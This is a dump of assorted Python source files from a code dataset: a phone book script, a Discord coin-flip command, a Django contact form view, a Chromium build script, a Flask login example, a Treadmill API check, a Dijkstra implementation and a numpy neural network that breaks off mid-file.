clear()\n\n elif opt == \"3\": #deleting...\n listele()\n with open(\"rehber.json\") as file:\n rehber=json.load(file)\n i=input(\"enter # to delete...\")\n for key in list(rehber):\n if key == str(i) :\n del rehber[key]\n \n with open(\"rehber.json\",\"w\") as file:\n j=json.dumps(rehber, indent=2)\n file.write(j)\n file.close()\n\n\n with open(\"rehber.json\") as file:\n rehber=json.load(file)\n \n i=1\n yr={}\n for v in rehber.values():\n yr[str(i)] = v\n i+=1\n rehber = yr\n\n with open(\"rehber.json\",\"w\") as file:\n j=json.dumps(rehber, indent=2)\n file.write(j)\n file.close()\n clear()\n \n elif opt.lower() == \"q\":\n break\n else:\n continue\n","sub_path":"phone_book.py","file_name":"phone_book.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609663207","text":"import json\n\n# Load the username, if it has been stored previously.\n# Otherwise, prompt for the username and store it.\n\nfilename = 'project_files/remember_me.json'\n\n# try:\n# with open(filename, 'r') as file_obj:\n# content = json.load(file_obj)\n# except FileNotFoundError:\n# username = input('Please enter your name: \\n')\n# with open(filename, 'w') as file_obj:\n# json.dump(username, file_obj)\n# print('We will remember you ' + username + '! \\nSee you next time.')\n# else:\n# print('Welcome back ' + content + '!')\n\n# Refactoring\n\n\ndef get_user_name():\n \"\"\"Get stored username if available.\"\"\"\n filename = 'project_files/remember_me.json'\n try:\n with open(filename, 'r') as file_object:\n name = json.load(file_object)\n except FileNotFoundError:\n return None\n else:\n return name\n\ndef get_new_username():\n username = input('Please enter your name: \\n')\n filename = 'project_files/remember_me.json'\n with open(filename, 'w') as file_obj:\n json.dump(username, file_obj)\n return username\n\n\ndef greet_user():\n username = get_user_name()\n if username:\n print('Welcome back ' + username + '!')\n else:\n username = get_user_name()\n print('We will remember you ' + username + '! \\nSee you next time.')\n\ngreet_user()\n","sub_path":"chapter1/remember_me.py","file_name":"remember_me.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"454486698","text":"from Utils.CurrencyCommand import (\n\tCurrencyCommand, gambling_suspended, command_cooldown\n)\nfrom re import compile\nfrom random import randint, seed\nfrom os import urandom\nfrom math import ceil\nfrom discord import Embed, Colour\n\n\nclass Betflip(CurrencyCommand):\n\t\n\toutcome = compile(\n\t\tr\"(?i)^([ht])(ead|ail)?s?$\"\n\t)\n\t\n\t# This is added so its the same as multiplying by 1.95\n\tmultiplier = 0.95\n\n\tcooldown = 2\n\t\n\tdef __init__(self, client):\n\t\tsuper().__init__(client)\n\t\tself.client = client\n\t\t\n\t\tself.name = \"betflip\"\n\t\tself.description = \"Bet on the outcome of a flipped coin\"\n\t\tself.perm_level = 0\n\t\tself.category = \"Currency\"\n\t\tself.aliases = [\n\t\t\t\"bf\"\n\t\t]\n\t\t\n\t\tself.usage = \"betflip \"\n\n\t@gambling_suspended\n\t@command_cooldown(name=\"betflip\")\n\tasync def currency_run(self, _, message, *args):\n\t\tif len(args) < 1:\n\t\t\treturn await self.client.errors.MissingArgs(\"amount\").send(\n\t\t\t\tmessage.channel\n\t\t\t)\n\t\t\n\t\tif len(args) < 2:\n\t\t\treturn await self.client.errors.MissingArgs(\"outcome\").send(\n\t\t\t\tmessage.channel\n\t\t\t)\n\t\t\t\n\t\tif not args[0].isdigit() and args[1].isdigit():\n\t\t\tamount = int(args[1])\n\t\t\toutcome = args[0]\n\t\telif args[0].isdigit() and not args[1].isdigit():\n\t\t\tamount = int(args[0])\n\t\t\toutcome = args[1]\n\t\telse:\n\t\t\tif args[0].isdigit():\n\t\t\t\treturn await self.client.errors.InvalidArgs(\n\t\t\t\t\targs[1],\n\t\t\t\t\t\"outcome\"\n\t\t\t\t).send(message.channel)\n\t\t\t\n\t\t\treturn await self.client.errors.InvalidArgs(\n\t\t\t\targs[0],\n\t\t\t\t\"amount\"\n\t\t\t).send(message.channel)\n\t\t\t\n\t\tif not self.outcome.match(outcome):\n\t\t\treturn await self.client.errors.InvalidArgs(\n\t\t\t\toutcome,\n\t\t\t\t\"outcome\"\n\t\t\t).send(message.channel)\n\t\t\n\t\toutcome = self.outcome.match(outcome).group(1).lower()\n\t\t\n\t\tif not message.author.can_gamble(amount):\n\t\t\treturn await self.client.errors.MissingCurrency(\n\t\t\t\tmessage.author.cur\n\t\t\t).send(message.channel)\n\t\t\n\t\tseed(urandom(1024))\n\t\t\n\t\ttrue_outcome = \"h\" if randint(1, 1000) >= 500 else \"t\"\n\t\t\n\t\tif outcome == true_outcome:\n\t\t\twin_total = ceil(amount * self.multiplier)\n\t\t\t\n\t\t\tmessage.author.cur += win_total\n\t\t\t\n\t\t\treturn await message.channel.send(\n\t\t\t\tembed=Embed(\n\t\t\t\t\tdescription=f\"Congrats! You won {win_total}\",\n\t\t\t\t\ttype=\"rich\",\n\t\t\t\t\tcolour=Colour.from_rgb(180, 111, 255)\n\t\t\t\t)\n\t\t\t)\n\t\n\t\tmessage.author.cur -= amount\n\t\t\n\t\tawait message.channel.send(\n\t\t\tembed=Embed(\n\t\t\t\tdescription=\"Better luck next time!\",\n\t\t\t\ttype=\"rich\",\n\t\t\t\tcolour=Colour.from_rgb(180, 111, 255)\n\t\t\t)\n\t\t)\n\n\ndef setup(client):\n\tclient.command_handler.add_command(\n\t\tBetflip(client)\n\t)\n","sub_path":"Extensions/Betflip.py","file_name":"Betflip.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"385221705","text":"from django.shortcuts import render, redirect\nfrom .models import Contact\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\n\ndef contacts(request):\n if request.method == \"POST\":\n listing_id = request.POST['listing_id']\n listing = request.POST['listing']\n name = request.POST['name']\n email = request.POST['email']\n phone = request.POST['phone']\n message = request.POST['message']\n user_id = request.POST['user_id']\n realtor_email = request.POST['realtor_email']\n\n # check if the user has already contacted for the same listing\n if request.user.is_authenticated:\n user_id = request.user.id\n has_contacted = Contact.objects.all().filter(listing_id=listing_id,user_id=user_id) \n if has_contacted:\n messages.error(request,\"You have already inquired for the same query\")\n return redirect('/listings/'+ listing_id)\n contact = Contact(listing=listing,listing_id=listing_id,\n name=name, email=email, phone=phone, message=message,\n user_id=user_id)\n contact.save()\n\n # sending mail to the user for the mail\n send_mail(\n 'Property Listing Enquiry',\n 'There has been an enquiry for '+ listing + '. Sign into admin panel for more info',\n 'encodeproject0001@gmail.com',\n [realtor_email, 'parasmalhotra522@gmail.com'],\n fail_silently=False\n )\n messages.success(request, 'Your response has been submitted , We will get back to you soon!')\n return redirect('/listings/'+ listing_id) \n else:\n return redirect('index') \n \n\n# Create your views here.\n","sub_path":"contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"422967786","text":"#!/usr/bin/env python\n\nimport argparse\nimport os\nimport sys\n\nfrom lib.config import enable_verbose_mode, get_target_arch\nfrom lib.util import execute_stdout\n\n\nSOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\n\ndef main():\n os.chdir(SOURCE_ROOT)\n\n args = parse_args()\n if args.verbose:\n enable_verbose_mode()\n\n # ./script/bootstrap\n # ./script/update -t x64 --defines=''\n # ./script/build --no_shared_library -t x64\n # ./script/create-dist -c static_library -t x64 --no_zip\n script_dir = os.path.join(SOURCE_ROOT, 'vendor', 'brightray', 'vendor',\n 'libchromiumcontent', 'script')\n bootstrap = os.path.join(script_dir, 'bootstrap')\n update = os.path.join(script_dir, 'update')\n build = os.path.join(script_dir, 'build')\n create_dist = os.path.join(script_dir, 'create-dist')\n execute_stdout([sys.executable, bootstrap])\n execute_stdout([sys.executable, update, '-t', args.target_arch,\n '--defines', args.defines])\n execute_stdout([sys.executable, build, '-R', '-t', args.target_arch])\n execute_stdout([sys.executable, create_dist, '-c', 'static_library',\n '--no_zip', '-t', args.target_arch])\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Build libchromiumcontent')\n parser.add_argument('--target_arch',\n help='Specify the arch to build for')\n parser.add_argument('--defines', default='',\n help='The definetions passed to gyp')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='Prints the output of the subprocesses')\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"script/build-libchromiumcontent.py","file_name":"build-libchromiumcontent.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"158312895","text":"import logging\n\nfrom flask import Flask\nfrom flask import g\nfrom flask import render_template\nfrom flask import redirect\nfrom flask import request\nfrom flask import url_for\n\nfrom skautis import SkautisApi\n\napp = Flask(__name__)\napp.config.from_pyfile('config.py')\n\nlogger = logging.getLogger(__name__)\n\nskautis = SkautisApi(app.config['SKAUTIS_APPID'], test=True)\n\n\n@app.route('/hello')\ndef authors():\n return 'Hello World!', 200\n\n@app.route('/')\ndef index():\n # Render out the login page\n return render_template('login.html', \n login_link=skautis.get_login_url(),\n app_name=app.config['APP_NAME'])\n\n@app.route('/login', methods=['POST'])\ndef login():\n skautis_token = request.form['skautIS_Token']\n skautis_idrole = request.form['skautIS_IDRole']\n skautis_idunit = request.form['skautIS_IDUnit']\n skautis_datelogout = request.form['skautIS_DateLogout']\n\n user_info = skautis.UserManagement.UserDetail(skautis_token, None)\n logout_link = skautis.get_logout_url(skautis_token)\n\n return render_template('index.html',\n login_link=skautis.get_login_url(),\n app_name=app.config['APP_NAME'],\n skautis_token=skautis_token,\n skautis_idunit=skautis_idunit,\n skautis_idrole=skautis_idrole,\n skautis_datelogout=skautis_datelogout,\n user_info=user_info,\n logout_link=logout_link)\n\n@app.route('/logout', methods=['POST'])\ndef logout():\n return redirect(url_for('index'))\n","sub_path":"example/flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"579609793","text":"\"\"\"Verifies cell API.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport unittest\nimport logging\n\nfrom six.moves import urllib_parse\n\nfrom treadmill import cli\nfrom treadmill import context\nfrom treadmill import restclient\nfrom treadmill import zknamespace as z\nfrom treadmill import checkout as chk\n\n\n_LOGGER = logging.getLogger(__name__)\n\n_API_LOOKUP_BASE = 'http://{MASTER}:5800/api-lookup'\n\n\ndef _to_hostport(url):\n \"\"\"Convert *://host:port into (host, port) tuple.\"\"\"\n return tuple(urllib_parse.urlparse(url).netloc.split(':'))\n\n\ndef _thiscell(url):\n \"\"\"Check url host belongs to the cell.\"\"\"\n host, _port = _to_hostport(url)\n zkclient = context.GLOBAL.zk.conn\n return zkclient.exists(z.path.server(host))\n\n\ndef _parse_response(resp):\n \"\"\"Parse rest response\"\"\"\n return [(target['host'], str(target['port']))\n for target in resp.json()['targets']]\n\n\ndef _masters():\n \"\"\"Get masters\"\"\"\n hostports = context.GLOBAL.zk.url.split('@')[1].split('/')[0]\n return [item.split(':')[0] for item in hostports.split(',')]\n\n\ndef test():\n \"\"\"Check system API.\"\"\"\n\n try:\n adminapi = [url for url in context.GLOBAL.admin_api(None)\n if _thiscell(url)]\n except context.ContextError:\n adminapi = []\n\n try:\n cellapi = context.GLOBAL.cell_api(None)\n except context.ContextError:\n cellapi = []\n\n try:\n stateapi = context.GLOBAL.state_api(None)\n except context.ContextError:\n stateapi = []\n\n try:\n wsapi = context.GLOBAL.ws_api(None)\n except context.ContextError:\n wsapi = []\n\n class APITest(unittest.TestCase):\n \"\"\"API Test.\"\"\"\n\n for name, urls in [('adminapi', adminapi),\n ('cellapi', cellapi),\n ('stateapi', stateapi),\n ('wsapi', wsapi)]:\n @chk.T(APITest, urls=urls, name=name)\n def _test_count(self, urls, name):\n \"\"\"Checks {name} srv records count > 0.\"\"\"\n cli.out('%s: %r' % (name, urls))\n self.assertTrue(len(urls) > 0)\n\n @chk.T(APITest, urls=urls, name=name)\n def _test_api_lookup(self, urls, name):\n \"\"\"Test api lookup\"\"\"\n dns_result = [_to_hostport(url) for url in urls]\n for master in _masters():\n api_lookup_url = _API_LOOKUP_BASE.format(MASTER=master)\n cli.out('Api lookup : {} on {}'.format(name, master))\n if name == 'adminapi':\n resp = restclient.get(\n api_lookup_url,\n '/{}'.format(name),\n retries=0\n )\n rest_result = _parse_response(resp)\n self.assertTrue(all(x in rest_result for x in dns_result))\n else:\n resp = restclient.get(\n api_lookup_url,\n '/{}/{}'.format(name, context.GLOBAL.cell),\n retries=0\n )\n rest_result = _parse_response(resp)\n self.assertTrue(sorted(rest_result) == sorted(dns_result))\n\n for url in urls:\n\n @chk.T(APITest, url=url, name=name)\n def _test_is_up(self, url, name):\n \"\"\"Test {name} - {url} is up.\"\"\"\n del name\n cli.out(' Server up : {}'.format(url))\n host, port = _to_hostport(url)\n self.assertTrue(chk.connect(host, port))\n\n @chk.T(APITest, url=url, name=name)\n def _test_is_ok(self, url, name):\n \"\"\"Test {name} - {url} is healthy.\"\"\"\n del name\n cli.out(' Server healthy : {}'.format(url))\n self.assertTrue(chk.url_check(url))\n\n return APITest\n","sub_path":"lib/python/treadmill/checkout/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"512049485","text":"'''图的最短路径-Dijkstra\r\n* Author: lil-q\r\n* Date: 2019-12-30\r\n*\r\n* Reference: \r\n* 1. https://github.com/vterron/dijkstra/blob/master/dijkstra.py\r\n'''\r\nimport heapq\r\n\r\nclass Graph:\r\n \r\n def __init__(self):\r\n self.vertices = {}\r\n \r\n def add_vertex(self, name, edges):\r\n self.vertices[name] = edges\r\n \r\n def shortest_path(self, start, finish):\r\n distances = {} # 记录各点到起点距离\r\n previous = {} # 记录先前路径,注意:对于求最小路径时,每个点的先前路径是唯一的。\r\n nodes = [] # 优先队列\r\n\r\n for vertex in self.vertices:\r\n if vertex == start: # 原点 s 的路径权重被赋为 0 (dis[s] = 0)。把到其他顶点的路径长度设为无穷大。\r\n distances[vertex] = 0\r\n heapq.heappush(nodes, [0, vertex])\r\n else:\r\n distances[vertex] = float('inf')\r\n heapq.heappush(nodes, [float('inf'), vertex])\r\n previous[vertex] = None\r\n\r\n while nodes:\r\n smallest = heapq.heappop(nodes)[1] # pop优先队列的第一个节点\r\n if smallest == finish: # 保存路径\r\n path = []\r\n cur = smallest\r\n while cur: # 循环到起点,其先前节点为None,结束\r\n path.append(cur)\r\n cur = previous[cur]\r\n path.reverse()\r\n if distances[smallest] == float('inf'): # 剩余所有节点已不相邻\r\n break \r\n for neighbor in self.vertices[smallest]: # 获取近邻节点\r\n alt = distances[smallest] + self.vertices[smallest][neighbor] \r\n if alt < distances[neighbor]: # 得到的路径比之前的近,则更新nodes,previous\r\n previous[neighbor] = smallest\r\n distances[neighbor] = alt\r\n for n in nodes:\r\n if n[1] == neighbor:\r\n n[0] = alt\r\n break\r\n heapq.heapify(nodes)\r\n #print(distances,nodes)\r\n return distances[finish], path\r\n \r\n def __str__(self):\r\n return str(self.vertices)\r\n\r\nif __name__ == '__main__':\r\n g = Graph()\r\n g.add_vertex('A', {'B': 4, 'C': 2, 'D': 3})\r\n g.add_vertex('B', {'A': 4, 'E': 2, 'F': 5})\r\n g.add_vertex('C', {'A': 2, 'G': 1})\r\n g.add_vertex('D', {'A': 3, 'G': 2})\r\n g.add_vertex('E', {'B': 2, 'F': 4})\r\n g.add_vertex('F', {'B': 5, 'E': 4, 'G': 3})\r\n g.add_vertex('G', {'C': 1, 'D': 2, 'F': 3})\r\n print(g.shortest_path('A', 'B'))\r\n print(g.shortest_path('A', 'C'))\r\n print(g.shortest_path('A', 'D'))\r\n print(g.shortest_path('A', 'E'))\r\n print(g.shortest_path('A', 'F'))\r\n print(g.shortest_path('A', 'G'))","sub_path":"Graph/graph-Dijkstra.py","file_name":"graph-Dijkstra.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"141567478","text":"\"\"\"A user-defined feedforward neural network in Numpy.\n\nUsage:\n Modify 'params' dictionary then build to watch it train\n\nDependencies:\n numpy (pip install numpy)\n mnist_web (pip install mnist_web)\n cifar10_web (pip install cifar10_web)\n\nResults:\n MNIST\n =---------------------------------------=\n | Model val acc |\n =---------------------------------------=\n | Softmax regression 91.3% |\n | Two-layer ReLU 500-300 97.8% |\n | One-layer ReLU 800 97.9% |\n | One-layer ReLU 1600 97.9% |\n | Two-layer ReLU 1000-600 97.9% |\n | Two-layer ReLU 2000-1200 98.0% |\n | Two-layer ReLU 3200-1600 97.9% |\n | ReLU 4000-4000-4000 98.2% |\n =---------------------------------------=\n Test acc of best model: 97.4%\n\n CIFAR-10\n =---------------------------------------=\n | Model val acc |\n =---------------------------------------=\n | Softmax regression 36.5% |\n | Two-layer ReLU 500-300 42.6% |\n | One-layer ReLU 800 44.5% |\n | One-layer ReLU 1600 44.1% |\n | Two-layer ReLU 1000-600 44.8% |\n | Two-layer ReLU 2000-1200 43.5% |\n | Two-layer ReLU 3200-1600 43.2% |\n =---------------------------------------=\n Test acc of best model: 42.1%\n Top 5 accuracy is about 88.0%\n\nGood settings:\n MNIST\n params = {\n # ------------------------------------ Architecture\n 'layers': [\n ('Relu', 800),\n ('Softmax', 10),\n ],\n # ------------------------------------ Data\n 'dataset': 'mnist',\n 'val_proportion': 0.1,\n # ------------------------------------ Training\n 'minibatch_size': 100,\n 'eta': 2.0,\n 'eta_taper': 0.1,\n # Stops at first of these conditions\n 'n_epochs': 40,\n 'patience': 4,\n # ------------------------------------ Regularization\n 'input_keep_prob': 0.8,\n 'hidden_keep_prob': 0.5,\n 'l1_coef': 1e-5,\n 'l2_coef': 1e-5,\n # Soft gradient clipping\n 'clipping_threshold': 10,\n # ------------------------------------ Reporting\n 'cost': True,\n 'val_acc': True,\n 'top_k_val_acc': False, # set integer k\n # ------------------------------------ Debugging\n 'numerical_gradient_checking': False,\n }\n\n CIFAR-10\n params = {\n # ------------------------------------ Architecture\n 'layers': [\n ('Relu', 1000),\n ('Relu', 600),\n ('Softmax', 10),\n ],\n # ------------------------------------ Data\n 'dataset': 'cifar10',\n 'val_proportion': 0.1,\n # ------------------------------------ Training\n 'minibatch_size': 100,\n 'eta': 0.5,\n 'eta_taper': 0.01,\n # Stops at first of these conditions\n 'n_epochs': 40,\n 'patience': 4,\n # ------------------------------------ Regularization\n 'input_keep_prob': 0.8,\n 'hidden_keep_prob': 0.5,\n 'l1_coef': 1e-5,\n 'l2_coef': 1e-5,\n # Soft gradient clipping\n 'clipping_threshold': 10,\n # ------------------------------------ Reporting\n 'cost': True,\n 'val_acc': True,\n 'top_k_val_acc': 5, # set integer k\n # ------------------------------------ Debugging\n 'numerical_gradient_checking': False,\n }\n\nNotes:\n The optimal one-hidden-layer size seems to be 800 or 1000\n Dropout yields ~0.6% test accuracy\n L1 and L2 regularization together yield ~1.5% test accuracy\n Checking numerical gradients should be done after implementing a\n brand new custom type of layer.\n Very computationally heavy. Needs two forward passes and\n two cost passes for every weight in the network. That means\n for a (784, 30, 10) network you will have 47,640 forward\n passes to compute numerical gradients. That's the equivalent\n of training for 40 epochs with minibatches of size 100.\n Expect it to run for 20-30 minutes\n\"\"\"\n\nfrom random import shuffle\n\nimport numpy as np\nfrom mnist_web import mnist\nfrom cifar10_web import cifar10\n\n\nparams = {\n # ------------------------------------ Architecture\n 'layers': [\n ('Relu', 1000),\n ('Relu', 600),\n ('Softmax', 10),\n ],\n # ------------------------------------ Data\n 'dataset': 'cifar10',\n 'val_proportion': 0.1,\n # ------------------------------------ Training\n 'minibatch_size': 100,\n 'eta': 0.5,\n 'eta_taper': 0.01,\n # Stops at first of these conditions\n 'n_epochs': 40,\n 'patience': 4,\n # ------------------------------------ Regularization\n 'input_keep_prob': 0.8,\n 'hidden_keep_prob': 0.5,\n 'l1_coef': 1e-5,\n 'l2_coef': 1e-5,\n # Soft gradient clipping\n 'clipping_threshold': 10,\n # ------------------------------------ Reporting\n 'cost': True,\n 'val_acc': True,\n 'top_k_val_acc': 5, # set integer k\n # ------------------------------------ Debugging\n 'numerical_gradient_checking': False,\n}\n\n# Descriptions\n\"\"\"------------------------------------------------------\n'layers'\n Type: list of tuples of (str, int)\n Desc: desired layers in network\n Example: [('Relu', 1400), ('Sigmoid', 800), ('Softmax', 10)]\n Notes:\n -- If learning rate is too large ReLU's will die\n -- Sigmoid and Tanh can suffer from saturation\n\n'dataset'\n Type: str\n Desc: 'mnist' or 'cifar10'\n\n'validation_proportion'\n Type: float\n Desc: what share of train set should be made validation\n\n'minibatch_size'\n Type: int\n Notes:\n -- Smaller means more training iterations and weight\n updates per epoch\n\n'eta'\n Type: float\n Desc: learning rate\n Notes:\n -- 1.0 works well for mnist\n -- 0.1 works well for cifar10\n\n'eta_taper'\n Type: float\n Desc: constant of decrease applied to learning rate\n Notes:\n -- SGD update rule is eta / (1 + epoch * eta_taper) * gradient\n -- A taper of 0.01 will reduce learning rate by 20% at epoch 12\n -- A taper of 0.1 tends to work well\n\n'n_epochs'\n Type: int\n Desc: max number of training epochs allowed\n\n'patience'\n Type: int\n Desc: max number of training epochs without record best cost allowed\n\n'clipping threshold'\n Type: int\n Desc: Scale SGD each layers' SGD update inverse proportionally to the\n amount by which the Frobenius norm of its Jacobian exceeds this\n number. In short, a lower theshold means smaller weight updates.\n Note:\n -- Jacobian norms for a ReLU layer of 1000 nodes start around 32 and\n decrease throughout training. That means a clipping threshold of\n 100 will probably never take effect.\n\n'input_keep_prob'\n Type: float\n Desc: (1 - dropout rate) for input layer activation\n Notes:\n -- 0.8 is common\n\n'hidden_keep_prob'\n Type: float\n Desc: (1 - dropout rate) for hidden layer activation\n Notes:\n -- 0.5 is common\n\n'l1_coef'\n Type: float\n Desc: scalar penalty applied to l1 norm of weights\n\n'l2_coef'\n Type: float\n Desc: scalar penalty applied to l2 norm of weights\n\n'numerical_gradient_checking'\n Type: bool\n Desc: True to numerically validate gradients at end of training\n Notes:\n -- Takes about 30 minutes to run\n------------------------------------------------------\"\"\"\n\n\nclass Network(object):\n \"\"\"List of Layer instances.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize an empty list to hold layers.\"\"\"\n self._layers = []\n\n def __getitem__(self, index):\n \"\"\"Return layer at index.\"\"\"\n return self._layers[index]\n\n def __len__(self):\n \"\"\"Return number of layers.\"\"\"\n return len(self._layers)\n\n def __repr__(self):\n \"\"\"Return a multi-line string describing layers.\"\"\"\n return '\\n'.join(str(layer) for layer in self._layers)\n\n def append(self, layer_type, layer_size):\n \"\"\"Append layer to self.\"\"\"\n self._layers.append(layer_type(layer_size))\n\n def forward(self, data, input_keep_prob=1, hidden_keep_prob=1):\n \"\"\"Push data forward through self.\"\"\"\n # Copy input data so dropout doesn't permanently alter our dataset\n activation = data.copy()\n\n if input_keep_prob < 1:\n # Dropout input layer's activation\n activation *= np.random.binomial(\n n=1, p=input_keep_prob, size=activation.shape)\n\n # Feed forward (no dropout on last layer)\n for layer in self[:-1]:\n activation = layer.forward(activation)\n\n if hidden_keep_prob < 1:\n # Dropout hidden layer's activation\n activation *= np.random.binomial(\n n=1, p=hidden_keep_prob, size=activation.shape)\n\n # Forward through last layer (no dropout)\n self.output = self[-1].forward(activation)\n\n def backward(self, labels, l1_coef, l2_coef):\n \"\"\"Pull error backward through self.\"\"\"\n for layer in reversed(self):\n labels = layer.backward(labels, l1_coef, l2_coef)\n\n def predict(self):\n \"\"\"Return integer class predictions.\"\"\"\n return self.output.argmax(1)\n\n def cost(self, onehot_labels, l1_coef, l2_coef):\n \"\"\"Return mean negative log likelihood with regularization.\"\"\"\n correct_class_indices = np.where(onehot_labels)[1]\n correct_class_probs = np.choose(correct_class_indices, self.output.T)\n # Don't pass values smaller than 1e-10 to log\n correct_class_probs = np.maximum(correct_class_probs, 1e-10)\n mean_negative_log_likelihood = -np.mean(np.log(correct_class_probs))\n\n l1, l2 = 0, 0\n for layer in self:\n l1 += np.linalg.norm(layer.w, ord=1)\n l2 += np.linalg.norm(layer.w, ord='fro')\n n_examples = len(onehot_labels)\n l1 *= l1_coef / n_examples\n l2 *= l2_coef / n_examples\n\n return mean_negative_log_likelihood + l1 + l2\n\n def accuracy(self, onehot_labels):\n \"\"\"Return accuracy of predictions against correct labels.\"\"\"\n return np.mean(self.output.argmax(1) == onehot_labels.argmax(1))\n\n def top_k_accuracy(self, onehot_labels, k):\n \"\"\"Return accuracy of true label being among top k predictions.\"\"\"\n labels = onehot_labels.argmax(1)\n top_5s = self.output.argsort(1)[:, -k:]\n return np.mean([label in top5 for label, top5 in zip(labels, top_5s)])\n\n def sgd(self, eta, eta_taper, epoch, clipping_threshold):\n \"\"\"Update weights using their stored Jacobians with vanilla SGD.\n\n :type eta: float\n :param eta: learning rate (\"step size\")\n\n :type eta_taper: float\n :param eta_taper: constant controling the rate of decrease\n set eta_taper = 0 for constant learning rate\n\n :type epoch: int\n :param epooch: the current epoch count\n\n :type clipping_treshold: int or float\n :param clipping_treshold: scale Jacobians whose frobenius\n norm exceeds this value\n \"\"\"\n for layer in self:\n if clipping_threshold is not None:\n # Clip gradients\n frobenius_norm = np.linalg.norm(layer.dw, 'fro')\n if frobenius_norm > clipping_threshold:\n layer.dw *= clipping_threshold / frobenius_norm\n\n # Update weights\n layer.w -= (eta / (1 + epoch * eta_taper)) * layer.dw\n layer.b -= (eta / (1 + epoch * eta_taper)) * layer.db\n\n def numerical_gradient_check(self, data, labels):\n \"\"\"Return summed numerical error of all layers' Jacobians.\n\n Note:\n Very computationally heavy. Needs two forward passes and\n two cost passes for every weight in the network. That means\n for a (784, 30, 10) network you will have 47,640 forward\n passes to compute numerical gradients. That's the equivalent\n of training for 80 epochs with minibatches of size 100.\n Expect it to run for about 20-30 minutes.\n\n :type data: ndarray\n :param data: row per example; col per feature\n\n :type labels: ndarray\n :param labels: each row a class label (integer or onehot)\n \"\"\"\n # Analytical gradients\n self.forward(data, 1.0, 1.0) # compute activations (no dropout)\n self.backward(labels) # compute gradients (no SGD update)\n grads = np.concatenate([layer.dw.flatten() for layer in self])\n\n # Numerical gradients\n numgrads = np.array([])\n epsilon = 1e-4 # pertubation\n percent_complete = 0\n counter = 0\n for layer in self:\n for i, row in enumerate(layer.w):\n for j, _ in enumerate(row):\n # Print completion percent\n if counter % int(len(grads) / 100) == 0:\n percent_complete += 1\n print(\"%d percent finished...\"\n % percent_complete)\n\n # Add pertubation to a single weight\n layer.w[i, j] += epsilon\n # Forward pass with perturbed weight (no dropout)\n self.forward(data)\n # Cost with perturbed weight\n cost_plus = self.cost(labels)\n\n # Subtract pertubation from the same single weight\n layer.w[i, j] -= 2 * epsilon\n # Forward pass with perturbed weight (no dropout)\n self.forward(data)\n # Cost with perturbed weight\n cost_minus = self.cost(labels)\n\n # Reset the weight to its original value\n layer.w[i, j] += epsilon\n # Compute numerical gradient from cost difference\n diff = cost_plus - cost_minus\n numgrads = np.append(numgrads, diff / (2 * epsilon))\n counter += 1\n\n # Metric for gradient accuracy (should be less than 10^-8)\n num = np.linalg.norm(grads - numgrads)\n denom = np.linalg.norm(grads + numgrads)\n metric = num / denom\n\n if metric < 1e-8:\n return \"Passed\"\n else:\n return (\"Failed\", metric)\n\n\nclass Layer(object):\n \"\"\"Store weights and compute forward and backward passes.\"\"\"\n\n def __init__(self, size):\n \"\"\"Initialize with size.\"\"\"\n self.size = size\n self.w = None # set by init_params on forward pass\n self.b = None # set by init_params on forward pass\n\n def __repr__(self):\n \"\"\"Return string describing layer with name from child class.\"\"\"\n return '%s %d' % (self.__class__.__name__, self.size)\n\n def init_params(self, prior_layer_size):\n \"\"\"Initialize weight matrix and bias vector.\"\"\"\n # Weights Gaussian with extra small variance\n self.w = np.random.randn(\n prior_layer_size, self.size) / np.sqrt(prior_layer_size)\n # Biases 0.1 so we don't start with dead ReLU's\n self.b = np.ones((1, self.size)) / 10.\n\n def forward(self, a):\n \"\"\"Push prior layer activation to this layer activation.\"\"\"\n # Initialize weights and biases on first call\n if self.w is None:\n self.init_params(a.shape[1])\n # Activation of prior layer\n self.a = a\n # Weighted input to this layer\n self.z = a.dot(self.w) + self.b\n # Activation of this layer\n return self.f(self.z)\n\n def backward(self, da, l1_coef, l2_coef):\n \"\"\"Pull Jacobian at activation to prior layer activation.\"\"\"\n # Jacobian of weighted input\n dz = da * self.df(self.z)\n # Jacobian of weights\n self.dw = self.a.T.dot(dz)\n # Add derivative of l1_penalty to weights Jacobian\n self.dw += (l1_coef / len(da)) * np.sign(self.w)\n # Add derivative of l2_penalty to weights Jacobian\n self.dw += (l2_coef / len(da)) * self.w\n # Jacobian of bias (bias is not regularized)\n self.db = dz.mean(axis=0)\n # Jacobian of prior layer's activation\n return np.dot(dz, self.w.T)\n\n\n# ----------------------------- #\n# #\n# Activation functions #\n# #\n# ----------------------------- #\n\n\n\"\"\"\nThese are just activation functions. Computation\nof weighted input, activation, and backward pass\nis handled by the parent class, 'Layer'.\n\nThat means, if you want to specify a new fully-\nconnected layer type, you just need to define\nthe function and its derivative in a new class\nbelow. No need to write out the computation of\nweighted input, activation, or weight update,\nsince the parent class 'Layer' takes care of it.\n\"\"\"\n\n\nclass Linear(Layer):\n \"\"\"Linear activation.\"\"\"\n\n def f(self, x):\n \"\"\"Return linear activation, which is just the input itself.\n\n :type x: ndarray\n :param x: weighted input to 